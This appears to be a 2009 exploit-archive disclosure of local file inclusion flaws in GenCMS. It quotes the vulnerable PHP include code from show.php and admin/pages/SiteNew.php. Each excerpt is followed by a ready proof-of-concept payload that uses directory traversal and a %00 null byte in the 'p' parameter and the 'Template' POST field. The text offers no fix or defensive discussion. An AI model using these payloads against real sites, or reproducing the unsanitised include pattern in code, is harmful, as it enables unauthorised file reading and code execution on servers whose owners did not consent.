GenCMS http://gencms.berlios.de/ eLwaux(c)2009 LFI /show.php ---------------------------------------------------------------------------------------------------- 18: $param = $_GET['p']; 19: if(empty($param)) $param = 'news'; 20: //get right page 21: //$page = $param.'.php'; 22: 23: //static or dynamic 24: if(GC_FULLSTATIC) 25: { 26: $page = $param.'.htm'; 27: staticpage($page); 28: } 29: else 30: { 31: $page = GC_IPATH.'_base/sites/'.$param.'.php'; 32: dynamicpage($page); 33: } ---------------------------------------------------------------------------------------------------- PoC: /show.php?p=../../{FILE.PHP}%00 LFI /admin/pages/SiteNew.php ---------------------------------------------------------------------------------------------------- 14: if(!empty($_GET['step'])) $Step = $_GET['step']; 23: if ($Step == "2") 24: { 25: // allgemeine settings 26: //include blocks from template config 27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php'); 28: $TPLBlocks = explode(';',$TemplateSettings); 29: } ---------------------------------------------------------------------------------------------------- PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )